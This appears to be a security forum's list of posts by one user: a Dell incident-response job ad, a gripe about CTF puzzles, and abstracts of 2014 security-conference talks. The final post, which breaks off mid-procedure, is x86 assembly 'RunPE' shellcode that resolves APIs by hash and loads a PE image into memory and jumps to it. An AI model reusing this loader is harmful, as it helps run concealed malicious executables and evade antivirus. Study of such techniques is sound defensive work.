Nytro

Everything posted by Nytro

  1. Incident Management Sr. Advisor
     Bucharest, Romania

     We are currently looking for an Incident Management Sr. Advisor that will be part of Dell's internal security team.

     Responsibilities:
     • Respond to critical computer security incidents by collecting, analyzing and preserving digital evidence
     • Assemble and coordinate with technical teams and third-party vendors to resolve incidents as quickly and efficiently as possible
     • Communicate status of response, resolution and final root cause analysis to the appropriate stakeholders
     • Ensure that all incidents are recorded and tracked to meet audit and legal requirements
     • Conduct root cause analysis to identify gaps and recommendations, ultimately remediating risks
     • Communicate effectively with representatives of the Lines of Business, technology specialists, and vendors
     • Gather forensic evidence for disciplinary action or criminal investigation
     • Partner with all business lines to investigate internal code of conduct, fraud and other investigations as instructed by the CISO
     • Conduct advanced computer and network forensic investigation functions relating to various forms of electronic fraud, identity theft, e-commerce fraud, computer intrusion, theft of information, denial of service, multi-national organized electronic criminal groups, as well as financial fraud investigations
     • Perform other essential duties as assigned
     • Some basic system administration duties
     • Vendor communications for technical support where required

     Qualifications / Requirements:
     • 5+ years' experience in the IT industry, including at least 2 in the Information Security sector with a focus on Incident Response
     • Emerging information security technologies and development methodologies
     • UNIX, Linux, and Microsoft operating systems
     • Security software and tools
     • PCI compliance
     • Superior communication, organization, and interpersonal skills and demonstrated effectiveness in a customer-facing role

     Company Description
     With more than 100,000 team members globally, we promote an environment that is rooted in the entrepreneurial spirit in which the company was founded. Dell's team members are committed to serving our communities, regularly volunteering for over 1,500 non-profit organizations. The company has also received many accolades, from employer of choice to energy conservation. Our team members follow an open approach to technology innovation and believe that technology is essential for human success.

     Why work with us?
     - Life at Dell means collaborating with dedicated professionals with a passion for technology.
     - When we see something that could be improved, we get to work inventing the solution.
     - Our people demonstrate our winning culture through positive and meaningful relationships.
     - We invest in our people and offer a series of programs that enable them to pursue a career that fulfills their potential.
     - Our team members' health and wellness is our priority, as well as rewarding them for their hard work.

     Link: https://dell.referrals.selectminds.com/jobs/security-analysis-sr-advisor-39919?et=FvAn1Ukf

     Or, if you are interested, give me your CV and I will pass it on.
  2. In general, at CTFs, absurd things show up depending on who makes the challenge:
     - If they like anime, they put in some text and you are supposed to figure out which character from that anime it is
     - If they like Sasha Grey, they put in an "Aa oo aaa oo uuuuuu" and you have to figure out the name of the film (joking)
     - If they get the urge to set a bit at position 7 in an image, you are supposed to figure out the idea they had while they were high
     - If they want to build the Fibonacci sequence out of the number of pixels in an image, you are supposed to figure that out
     Anyway, I think you get the idea. That is what I don't like, and I think many others don't like it either: solving a STUPID idea that has nothing at all to do with technique or the skills of the competitors. Will there be challenges like that?
  3. Dropping Docs On Darknets: How People Got Caught
     Adrian Crenshaw
     ShowMeCon 2014 - ShowMeCon Hacking Conference, St. Louis, Missouri

     Most of you have probably used Tor before, but I2P may be unfamiliar. Both are anonymization networks that allow people to obfuscate where their traffic is coming from, and also host services (web sites for example) without it being tied back to them. This talk will give an overview of both, but will focus on real world stories of how people were deanonymized. Example cases like Eldo Kim & the Harvard Bomb Threat, Hector Xavier Monsegur (Sabu)/Jeremy Hammond (sup_g) & LulzSec, Freedom Hosting & Eric Eoin Marques and finally Ross William Ulbricht/“Dread Pirate Roberts” of the SilkRoad, will be used to explain how people have been caught and how it could have been avoided.

     Bio: Adrian Crenshaw has worked in the IT industry for the last fifteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools. He did the cert chase for a while (MCSE NT 4, CNE, A+, Network+, i-Net+) but stopped once he had to start paying for the tests himself. He holds a Master of Science in Security Informatics and is also one of the co-founders of Derbycon.

     Source: Dropping Docs On Darknets: How People Got Caught - Adrian Crenshaw (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  4. Thinking Outside The (Sand)Box
     Kyle Adams
     ShowMeCon 2014 - ShowMeCon Hacking Conference, St. Louis, Missouri

     Incorporating sandboxing and heuristic-based malware detection into security solutions is the new black. Unfortunately, malware writers know this too and are designing their exploits to only run once clear of any sandboxes. If they can avoid getting analyzed and detected as malware, they will also avoid having a signature written and published. This seems like bad news for malware protection, but maybe not. It’s possible to trick evasive malware into thinking it’s continually running in a sandbox (even though it’s not) so it never executes its payload. This inoculates targeted machines from malware designed to evade sandbox analysis. My presentation will demonstrate some of the techniques modern malware uses to determine if it is running in a sandbox or being analyzed. I will also share deceptive techniques available to anyone, which can be used to inoculate a machine from being infected by these types of attacks. Thinking Outside the [sand]box. No antivirus necessary.

     Bio: Kyle Adams has been involved with security since a very early age. Self-taught, he learned the basics of hacking and security defense strategies long before entering the professional world. Early on, much of his professional focus was on web security threats like SQLi, XSS, CSRF, etc., but more recently he has started researching and working on products to defend against malware based threats. Kyle helped build and design the first commercial security solution based on deception and misinformation, evolving the concept of honeypot technology from a purely academic endeavor to a realistic intrusion prevention strategy (Junos Web App Secure, formerly Mykonos). He is now working on introducing similar deception techniques as a detection and prevention methodology into the malware space.

     Source: Thinking Outside The (Sand)Box - Kyle Adams (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  5. Bypassing EMET 4.1
     Jared DeMott @jareddemott
     BSides Chicago 2014

     The goal of this study is to gauge how difficult it is to bypass the protections offered by EMET, a popular Microsoft zero-day prevention capability. We initially focused on just the ROP protections, but later expanded the study to include a real world example. We were able to bypass EMET’s protections in example code and with a real world browser exploit. The primary novel elements in our research are: a deep study regarding the ROP protections, using example applications to show how to bypass each of the five ROP checks in a generic manner; and a detailed real world example showing how to defeat all relevant protections. Look for a new technique to bypass the stack pivot protection, shellcode complete with an EAF bypass, and more. These bypasses leverage generic limitations, and are not easily repaired. The impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code offer little lasting protection. This is true of EMET and other similar userland protections.

     Source: Bypassing EMET 4.1 - Jared DeMott - @jareddemott (BSides Chicago 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  6. The TrueCrypt audit - How it happened and what we found
     Kenneth White
     Circle City Con 2014 - Indy's First Hackercon

     Abstract: TrueCrypt is an open source file and whole disk encryption software package that runs on Windows, Macs, and Linux. It has been downloaded nearly 30 million times, and is one of the most popular security tools used by journalists, human rights activists, and countless organizations around the globe. In the 10 years since its original release by an anonymous development team, however, there had never been a formal cryptanalysis and security audit of the software. This presentation is about how the TrueCrypt Audit Project came to pass and how some of the best security minds, cryptographic engineers and privacy advocates in the world came together to successfully conduct a public, crowd-funded, open technical audit of this software. Details of our findings and the many lessons learned along the way will be presented. Any and all questions will be answered!

     Source: The TrueCrypt audit - How it happened and what we found — Kenneth White (Circle City Con 2014 Videos) (Hacking Illustrated Series InfoSec Tutorial Videos)
  7. Pentesting Layers 2 and 3
     Kevin Gennuso and Eric Mikulas

     Lower level network protocols have been around for decades and haven't changed much in that time. A number of tools to exploit weaknesses in those protocols have been released over the years, and those haven't changed much either. What has changed is the hardware. Routers used to be bulky, expensive, and proprietary. Now they are small, cheap, and open source. What better way is there to attack network gear than with another piece of network gear? This presentation will focus on layer 2 and layer 3 protocols, their weaknesses, and how to protect against exploitation. We'll revisit tools such as hping, Nemesis, Yersinia, and Loki and show how they can be used to attack vulnerable networks. Finally, we'll demonstrate our ports of these tools for use on routers that run OpenWRT.

     Kevin is a security testing manager and part time packet herder. He has over 17 years of experience in information security and network architecture, and has done work for a number of organizations ranging from dot-com era startups to large financial institutions. Eric is a software developer and pre-"maker" maker. He has been writing code and wielding a soldering iron since second grade. He has over 10 years of experience as a developer and has worked for a variety of companies both as a full-time employee and independent contractor.

     Source: Pentesting Layers 2 and 3 - Kevin Gennuso and Eric Mikulas Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
  8. Attacking and Defending Full Disk Encryption
     Tom Kopchak

     One of your company’s laptops was just stolen. You know that there was sensitive information on the machine. You also know that full disk encryption was deployed. Is your data safe? Can you prove it? Many organizations are flocking to full disk encryption solutions as a solution to their data security requirements. Unfortunately, many of these installations view the deployment of full disk encryption as a panacea for any and all security concerns for their laptop fleets. All too often, these systems are not properly configured and adequately tested. In this talk, Tom will analyze the challenges associated with attacking and defending systems protected with full disk encryption. Many of the examples provided will draw from Tom's personal experience, including several scenarios where a fully encrypted and powered down system was fully compromised as part of a penetration test.

     Tom Kopchak is a Senior Security Engineer at Hurricane Labs, an Information Security Firm in Cleveland, Ohio. Tom is an alum of the Rochester Institute of Technology, with a background in Computing Security and Information Security (MS) and Applied Networking and System Administration (BS). Tom’s passion for information security stems from his experiences in the Collegiate Cyber Defense Competition. His research areas include computer forensics and data storage technologies. When he is not working with computers, Tom enjoys composing, music improvisation (Acts of Music), and playing both the piano and organ.

     Source: Attacking and Defending Full Disk Encryption - Tom Kopchak Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
  9. Nmap Class for Hackers For Charity

     This is the Nmap class the Kentuckiana ISSA put on to support Hackers For Charity. Speakers include Jeremy Druin @webpwnized, Martin Bos @purehate_ and me @irongeek_adc. If you like the videos, please consider donating to Hackers For Charity.

     Nmap Class HFC Louisville ISSA Intro
     Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 1
     Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 2
     Nmap Class HFC Louisville ISSA OS And Service Fingerprinting Part 1
     Nmap Class HFC Louisville ISSA Kicking Ass With Nmap
     Nmap Class HFC Louisville ISSA Closing

     Source: Nmap Class for Hackers For Charity - Louisville ISSA (Hacking Illustrated Series InfoSec Tutorial Videos)
  10. Introduction to hacking with PowerShell - Scott Busby
      Source: Introduction to hacking with PowerShell - Scott Busby (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  11. HTTPS: Now You See Me - Tim Mullican
      Source: HTTPS: Now You See Me - Tim Mullican (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  12. 3D Printing for Work and Fun - Mirabela Rusu, Notacon 11
      Source: 3D Printing for Work and Fun (temp title) - Mirabela Rusu Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  13. Nindroid: Pentesting Apps for your Android device
      Michael Palumbo
      Notacon 11

      Synopsis: We explore the different “apps” available for the android platform that one can use for Local Area Network (LAN) pen testing and mischief. We will try to cover both the well known and newly available android applications for basic hacking needs and have a few laughs along the way.

      Bio: Michael is a 31-year-old computer researcher; he focuses his projects depending upon what his interest may be that week.

      Source: Nindroid: Pentesting Apps for your Android device - Michael Palumbo Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  14. Pwning the POS!
      Mick Douglas
      Notacon 11

      Synopsis: Everybody’s talking about the Target breach. However, there’s lots wrong with the retail space… and it’s been this way for quite some time! Focusing on Point of Sale (POS) systems, this talk will show you how exploit-friendly the POS ecosystem really is, and how you can help fix things.

      Bio: Mick likes to hack stuff. Of late, this means embedded systems. When he’s not “geeking it up” he goes on hikes and stuff to get away from das Blinkenlights.

      Source: Pwning the POS! - Mick Douglas Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  15. Wireless Mesh Protocols
      Alex Kot
      Notacon 11

      Synopsis: I plan to explain different ad-hoc mesh protocols and the difference between them. I also plan to go in depth with a decentralized approach called Better Approach to Mobile Ad-Hoc Networking (B.A.T.M.A.N.) that will be beneficial in a society absent of net neutrality.

      Bio: IT specialist that currently works at a credit union. Fond of open source software and a hobbyist of all technologies. I am an enthusiast for embedded open source router firmware, as you can see on my youtube channel.

      Source: Wireless Mesh Protocols - Alex Kot Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  16. Vaccinating Android
      Milan Gabor - Danijel Grah

      The number of mobile applications is rising and Android still holds a large market share. As these numbers of applications grow, we need better tools to understand how applications work and to analyze them. There is always a question of whether we can trust mobile applications to do only what they are allowed to do and whether they are really secure when transmitting our personal information to different servers. In the presentation some runtime techniques will be discussed and a tool will be released that offers two approaches to analyze Android applications. The basic principle of the first approach is injecting a small piece of code into the APK and then connecting to it and using Java Reflection to modify values at runtime, call methods, instantiate classes and create your own scripts to automate work. The second approach offers much the same functionality, but can be used without modifying an application. It uses Dynamic Dalvik Instrumentation to inject code at runtime so that modifying APKs isn't necessary. The tool is Java based and simple to use, but offers quite a few new possibilities for security engineers and pentesters.

      Bio: Milan Gabor is a Founder and CEO of Viris, a Slovenian company specialized in information security. He is a security professional, pen-tester and researcher. Milan is a distinguished and popular speaker on information security. He has previously been invited to speak at various events at different IT conferences in Slovenia and loves to talk to IT students at different Universities. He also leads and teaches ethical hacking. He is always on a hunt for new and uncovered things and he really loves and enjoys his job. Danijel Grah has a Bachelor's degree in Computer Science from the University of Ljubljana, Slovenia. He has been a Security Consultant at Viris for some time and is involved in penetration testing, security reviews, programming, consulting and research. He has a deep understanding of threats, vulnerabilities and trends. He likes to practice Information Security in everyday life. Danijel is devoted to his work, open minded, enjoys new challenges and he never stops studying.

      Source: Vaccinating Android Milan Gabor - Danijel Grah (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  17. Invasive Roots of Anti-Cheat Software
      Alissa Torres

      Some of the most sophisticated rootkit behaviors are implemented by today's anti-cheat gaming software, in a constantly evolving game of cat and mouse. Game hackers often look for flaws in a system or program’s logic, seeking to exploit them for their own performance gains. As cheats evolve to evade detection, so do the anti-cheat software products, employing hooking mechanisms to catch the newest subversions. Often the effectiveness of an anti-cheat implementation will affect legitimate users’ enjoyment (no one likes to play with cheaters, even cheaters themselves!), making it highly profitable for game developers to focus on improving this technology and expediently identifying game hackers. As a natural consequence, anti-cheat software has grown more invasive and intrusive. For example, a recent version of VAC (Valve's Anti-Cheat Software) was found to scrape gamers' system DNS cache in order to spot commercial game cheats and ban users. Just what else is being extricated from our gaming systems and which products are the worst offenders? By analyzing system memory, several anti-cheat software implementations will be isolated. With a cadre of reverse engineers, we will walk through just how these products are monitoring for game hacking behavior and if any of these techniques call into question aspects of their End User License Agreements.

      Bio: Alissa Torres is a certified SANS instructor, specializing in advanced computer forensics and incident response. Her industry experience includes serving in the trenches as part of the Mandiant Computer Incident Response Team (MCIRT) as an incident handler and working on an internal security team as a digital forensic investigator. She has extensive experience in information security, spanning government, academic, and corporate environments and holds a Bachelor's degree from the University of Virginia and a Master's from the University of Maryland in Information Technology. Alissa has taught as an instructor at the Defense Cyber Investigations Training Academy (DCITA), delivering incident response and network basics to security professionals entering the forensics community. She has presented at various industry conferences and numerous B-Sides events (those being the best events, obviously!). In addition to being a GIAC Certified Forensic Analyst (GCFA), she holds the GCFE, GPEN, GCIH, CISSP, EnCE, and CFCE.

      Source: Invasive Roots of Anti-Cheat Software - Alissa Torres (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  18. Anatomy of memory scraping, credit card stealing POS malware
      Amol Sarwate

      Credit card stealing RAM scraper malware is running amok compromising point-of-sale (POS) systems. Recent breaches have shown that exposure to such attacks is high and there is a lot at risk. This presentation shows how the attack is carried out by looking at the nuts-and-bolts of a home grown malware sample. During the demo we will pretend to be the bad guy and steal information from the belly of the POS process. Then we switch hats, expose the malware to multiple environmental hazards to study its behavior and identify strategies that can be implemented to make it hard for the malware to behave correctly and deter the bad guys. If all goes well, you will walk away with RAM scraping and prevention mojo.

      Bio: Amol heads Qualys' worldwide security engineering team responsible for vulnerability and compliance research. His team tracks emerging threats and develops software which identifies new vulnerabilities and insecure posture for Qualys’ VM, PC, PCI and QBC services. Amol is a veteran of the security industry and has devoted his career to protecting, securing and educating the community from security threats. Amol has presented his research on Vulnerability Trends, Security Axioms, SCADA security, Malware and other security topics at numerous security conferences, including RSA Conference, BlackHat, Hacker Halted, SecTor, BSides, InfoSec Europe, NullCon, GrrCon, ISSA, Homeland security Network HSNI and FS/ISAC. He regularly contributes to the SANS Top 20 expert consensus identifying the most critical security vulnerabilities. He writes the “HOT or NOT” column for SC Magazine and holds a US patent for Systems and Methods for Performing Remote Configuration Compliance Assessment of a Networked Computer Device.

      Source: Anatomy of memory scraping, credit card stealing POS malware - Amol Sarwate (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  19. USB write blocking with USBProxy
      Dominic Spill

      USB mass storage devices are some of the most common peripherals in use today. They number in the billions and have become the de-facto standard for offline data transfer. USB drives have also been implicated in malware propagation (BadBIOS) and targeted attacks (Stuxnet). A USB write blocker may help to prevent some of these issues and allow researchers to examine the content of the attempted writes. USBProxy allows us to build an external write blocker using cheap and widely available hardware that will be undetectable by the host system.

      Bio: Dominic Spill has been building packet sniffers and researching wireless security since 2007. He has been a security researcher and the lead developer for Ubertooth for the past two years while also working on Daisho, FCC.io and USBProxy.

      Source: USB write blocking with USBProxy - Dominic Spill (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  20. The untold story about ATM Malware - Daniel Regalado

      Everyone talks about ATM Malware; we can see videos on the Internet of these machines being hacked, but no one explains HOW an attacker can take control of an ATM and command it to dispense money at will. Is it possible to control an ATM from a cell phone? What about a Man-in-the-middle attack to intercept the traffic between the ATM and the bank? Come to my talk and learn these and many other techniques used by hackers from Venezuela to Russia who are emptying ATMs without restrictions.

      Bio: Daniel Regalado aka Danux is a Reverse engineer, Malware and Vulnerability researcher; he was responsible for dissecting the latest dangerous ATM malware named Ploutus as well as many other different Advanced Persistent Threats. He is the lead author of the Gray Hat Hacking book, 4th Edition, to be released by the end of 2014.

      Source: The untold story about ATM Malware - Daniel Regalado (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  21. Malware Analysis 101 - N00b to Ninja in 60 Minutes
      grecs

      Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when it's time to pass the more serious samples on to the big boys. This presentation covers several analysis environments and the three quick steps that allow almost anyone with a general technical background to go from n00b to ninja in no time. Well … maybe not a "ninja" per se, but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.

      Bio:

      Source: Malware Analysis 101 - N00b to Ninja in 60 Minutes - grecs (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  22. Evading code emulation: Writing ridiculously obvious malware that bypasses AV
      Kyle Adams

      Code emulation is a technology capable of detecting malware for which no signature exists. It’s a powerful step in the right direction for client security, but it’s a long way from mature. This talk will demonstrate how the code emulation engine in Anti-Virus Guard (AVG) can be reverse engineered by progressively testing its features, and ultimately evading detection. The result is a Command-and-Control (C&C) bot, in a non-obfuscated windows shell script, that AVG and many other leading AV engines will not detect. I will propose solutions on how these code emulation environments can be improved, making the detection of zero day malware far more successful going forward. This is not a jab against AVG, as they get enormous credit for including such a powerful tool in a free antivirus client.

      Bio: Kyle Adams has been involved with security since a very early age. Self-taught, he learned the basics of hacking and security defense strategies long before entering the professional world. Early on, much of his professional focus was on web security threats like SQLi, XSS, CSRF, etc., but more recently he started researching and working on products to defend against malware based threats. Kyle helped build and design the first commercial security solution based on deception and misinformation, evolving the concept of honeypot technology from a purely academic endeavor to a realistic intrusion prevention strategy (Junos WebApp Secure, formerly Mykonos). He is now working on introducing similar deception techniques as a detection and prevention methodology into the malware space.

      Source: Evading code emulation: Writing ridiculously obvious malware that bypasses AV - Kyle Adams (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  23. Hackers vs Auditors - Dan Anderson

      A view into what hackers are about and what auditors are about, comparing and contrasting the two.

      Bio: Dan Anderson has spent his life developing and implementing communications between systems and developing systems and applications in Military, Healthcare, and Mining. First, for the USAF, working on Navigation Systems on various aircraft, then in the Gold Mining industry for RTZ/Kennecott Utah Copper, and finally in the Healthcare Industry for Intermountain Healthcare. He has a background in Electrical Engineering and Chemistry with emphasis in Healthcare Informatics and has specialized in Information Security and Assurance, earning his Certified Information System Auditor (CISA) and Certified in Risk and Information Systems Control (CRISC), both from the Information Systems Audit and Control Association (ISACA). Additional certifications include: Certified Ethical Hacker (C|EH), Payment Card Industry Internal Security Assessor (ISA and PCIP), and Information Technology Infrastructure Library (ITIL v3). Dan has worked for Healthcare IT Vendors such as Cerner, GE, and IDX, and consults globally in Information Systems Security, Regulatory Compliance, Information Systems Audit, and Intellectual Property Assurance. Some of Dan’s work includes consulting for premier teaching hospitals such as Stanford Medical Center, Harvard’s Boston Children’s Hospital, University of Utah Hospital, and large Integrated Delivery Networks such as Sutter Health, Catholic Healthcare West, Kaiser Permanente, Veteran’s Health Administration, and Intermountain Healthcare. Dan is a Board member and current President of the Utah chapter of the Information Systems Audit and Control Association (ISACA), a Board member of UtahSec.org, a Board member and Vice President of the F.B.I. Infragard Salt Lake City Chapter, a member of the F.B.I. Citizen’s Academy Alumni Association, and a member of the Security Technical Committee of Health Level Seven (HL7). Board Member, Center for Excellence in Higher Education Program Advisory Committee. Board Member, Utah Valley University Cyber Security Program Community Advisory Board. Board Member, University of Utah Eccles School of Business Masters in Information Systems (MSIS) Program Advisory Board. Dan has served in positions as President, CEO, CIO, CISO, and Director for various companies, is currently a Chief Information Security Officer and Senior Management Consultant for Spectra Consulting Group, and also an Information Security Consultant for Intermountain Healthcare. In his spare time Dan has volunteered as an Ice Hockey coach for over 14 years in various youth hockey associations in Utah, has served as Head coach for Riverton High School and Midget Major AA travel teams, earning USA Hockey’s highest coaching level, Level 5 Master Coach. Dan lives in Murray, Utah.

      Source: Hackers vs Auditors - Dan Anderson (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  24. Attacking Drupal
      Greg Foss

      Drupal is a very popular content management system that has been widely adopted by government agencies, major businesses, social networks, and more -- underscoring why understanding how Drupal works and properly securing these applications is of the utmost importance. This talk focuses on the penetration tester's perspective of Drupal and dives into streamlining the assessment and remediation of commonly observed application and configuration flaws by way of custom exploit code and security checklists, all of which are open-source and can be downloaded and implemented following the presentation.

      Bio: Greg Foss is a Senior Security Research Engineer with the LogRhythm Labs Threat Intelligence Team, where he focuses on developing defensive strategies, tools and methodologies to counteract advanced attack scenarios. He has over 7 years of experience in the Information Security industry with an extensive background in Security Operations, focusing on Penetration Testing and Web Application Security. Greg holds multiple industry certifications including the OSCP, GPEN, GWAPT, GCIH, and C|EH, among others.

      Source: Attacking Drupal - Greg Foss (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
25. [h=5][asm x86] RunPE shellcode[/h]

use32
format binary
include 'win32a.inc'
include 'pe.inc'

; resolved kernel32 imports, filled in by RunPE_main
struct stAPITable
  pVirtualAllocEx_kernel32 dd ?
  pLoadLibraryA_kernel32   dd ?
  pVirtualProtect_kernel32 dd ?
ends

; entry stub: the return address pushed by this call gives the load delta
proc _GetDeltaProc, pPEImage
  stdcall RunPE_main, [pPEImage]
.Delta:
  ret
endp

proc RunPE_main pPEImage
  local pFileHeader:DWORD
  local pNewPEPlace:DWORD
  local APITable[0x14]:BYTE
  local pAPITable:DWORD
  local iResult:DWORD
  local huser32:DWORD
  local szuser32[0xb]:BYTE
  local pGetHashSz:DWORD
  local hkernel32:DWORD

  push edi
  push ecx
  push eax
  mov eax, [ebp+04h]
  sub eax, _GetDeltaProc.Delta          ; eax = delta between link-time and run-time address
  push eax
  pop ebx
  lea ebx, [ebx+GetHashSz]              ; run-time address of the hash routine
  push ebx
  pop DWord [pGetHashSz]
  call GetK32
  mov DWord [hkernel32], eax
  stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x632466f0
  mov DWord [APITable+stAPITable.pVirtualAllocEx_kernel32], eax
  stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x15f8ef80
  mov DWord [APITable+stAPITable.pVirtualProtect_kernel32], eax
  stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x71e40722
  mov DWord [APITable+stAPITable.pLoadLibraryA_kernel32], eax
  lea ecx, [APITable]
  mov DWord [pAPITable], ecx
  stdcall verifyPE, [pPEImage]
  cmp eax, 0x0
  jz .End
  push eax
  pop DWord [pFileHeader]
  stdcall DWord [APITable+stAPITable.pVirtualAllocEx_kernel32], -1, NULL, DWord [eax+IMAGE_OPTIONAL_HEADER32.SizeOfImage+sizeof.IMAGE_FILE_HEADER],\
          MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN, PAGE_READWRITE
  mov [pNewPEPlace], eax
  stdcall loadFile, [pAPITable], [pFileHeader], [pPEImage], [pNewPEPlace]
  stdcall loadImportTable, [pAPITable], [pGetHashSz], [pNewPEPlace]
  test eax, eax
  jz .End
  stdcall reloc_fixup, [pNewPEPlace], [pFileHeader]
  stdcall setPermissions, [pAPITable], [pFileHeader], [pPEImage], [pNewPEPlace]
  mov esi, [pFileHeader]
  mov eax, [esi+sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint]
  add eax, [pNewPEPlace]
  jmp eax
.End:
  pop eax
  pop ecx
  pop edi
  mov eax, DWord [iResult]
  ret
endp

; checks the MZ and PE signatures and returns a pointer to IMAGE_FILE_HEADER
proc verifyPE pImagePE
  local iResult:DWORD
  pusha
  push DWord [pImagePE]
  pop edx
  cmp Word [edx], WORD 0x5a4d
  jnz .Exit
  mov ecx, DWord [edx+IMAGE_DOS_HEADER.e_lfanew]
  add edx, ecx
  cmp DWord [edx], DWORD 0x4550
  jne .Exit
  lea edx, [edx+0x4]
.Exit:
  mov DWord [iResult], edx
  popa
  push DWord [iResult]
  pop eax
  ret
endp

; copies one section's raw data to its virtual address in the new image
proc loadSection pImageSectionHeader:DWORD, pImageBase:DWORD, pBase:DWORD
  pushad
  mov edx, [pImageSectionHeader]
  mov esi, [pImageBase]
  add esi, [edx+IMAGE_SECTION_HEADER.PointerToRawData]
  mov edi, [edx+IMAGE_SECTION_HEADER.VirtualAddress]
  add edi, [pBase]
  mov ecx, [edx+IMAGE_SECTION_HEADER.SizeOfRawData]
  cld
  rep movsb
  popad
  ret
endp

; copies the headers, then every section, into the freshly allocated image
proc loadFile pAPITable:DWORD, pImageFileHeader:DWORD, pImageBase, pBase:DWORD
  local .iSectNum:DWORD, .pImageBase:DWORD, .pImageOptionalHeader:DWORD, .pSectionHeaders:DWORD, .iPEHeaderSize:DWORD
  pushad
  mov edx, [pImageFileHeader]
  movzx eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections]
  mov [.iSectNum], eax
  lea edx, [edx+sizeof.IMAGE_FILE_HEADER]
  lea ebx, [edx + IMAGE_OPTIONAL_HEADER32.DataDirectory]
  mov eax, [edx + IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
  mov edx, sizeof.IMAGE_DATA_DIRECTORY
  mul edx
  add eax, ebx
  mov [.pSectionHeaders], eax
  mov eax, sizeof.IMAGE_SECTION_HEADER
  mov edx, [.iSectNum]
  mul edx
  add eax, [.pSectionHeaders]
  sub eax, [pImageBase]
  mov ecx, eax
  mov edi, [pBase]
  mov esi, [pImageBase]
  rep movsb
  mov ecx, [.iSectNum]
  mov ebx, [.pSectionHeaders]
.load_section_loop:
  stdcall loadSection, ebx, [pImageBase], [pBase]
  add ebx, sizeof.IMAGE_SECTION_HEADER
  dec ecx
  jnz .load_section_loop
.Exit:
  popad
  ret
endp

; makes the headers read-only and applies per-section page protections
proc setPermissions APITable:DWORD, pImageFileHeader:DWORD, pImageBase:DWORD, pBase:DWORD
  local .number_of_sections:DWORD, .image_base:DWORD, .section_headers:DWORD, .pe_header_size:DWORD, .vprotect_ret:DWORD, .retval:DWORD
  pushad
  xor eax, eax
  mov [.retval], eax
  mov edx, [pImageFileHeader]
  movzx eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections]
  mov [.number_of_sections], eax
  add edx, sizeof.IMAGE_FILE_HEADER
  mov eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
  mov [.image_base], eax
  lea ebx, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
  mov eax, [edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
  mov edx, sizeof.IMAGE_DATA_DIRECTORY
  mul edx
  add eax, ebx
  mov [.section_headers], eax
  mov eax, sizeof.IMAGE_SECTION_HEADER
  mov edx, [.number_of_sections]
  mul edx
  add eax, [.section_headers]
  mov ebx, [pImageBase]
  sub eax, ebx
  mov [.pe_header_size], eax
  mov edx, [APITable]
  lea eax, [.vprotect_ret]
  stdcall dword [edx+stAPITable.pVirtualProtect_kernel32], [pBase], [.pe_header_size], PAGE_READONLY, eax
  test eax, eax
  jz .exit
  mov ecx, [.number_of_sections]
  mov ebx, [.section_headers]
.load_section_loop:
  stdcall setSection, [APITable], ebx, [pBase], [pImageBase]
  test eax, eax
  jz .exit
  add ebx, sizeof.IMAGE_SECTION_HEADER
  loop .load_section_loop
  inc [.retval]
.exit:
  popad
  mov eax, [.retval]
  ret
endp

; maps IMAGE_SCN_MEM_* characteristics of one section to a PAGE_* protection
proc setSection APITable:DWORD, pSectionHeader:DWORD, pBase:DWORD, pImageBase:DWORD
  local .section_flags:DWORD, .retval:DWORD, .vprotect_ret:DWORD
  pushad
  xor ebx, ebx
  mov [.retval], ebx
  mov edx, [pSectionHeader]
  ;section execute/read/write?
  mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics]
  and ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
  cmp ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
  jne .no_execute_read_write
  mov eax, PAGE_EXECUTE_READWRITE
  mov [.section_flags],eax
  jmp .set_memory
.no_execute_read_write:
  mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics]
  and ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
  cmp ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
  jne .no_execute_read
  mov eax, PAGE_EXECUTE_READ
  mov [.section_flags],eax
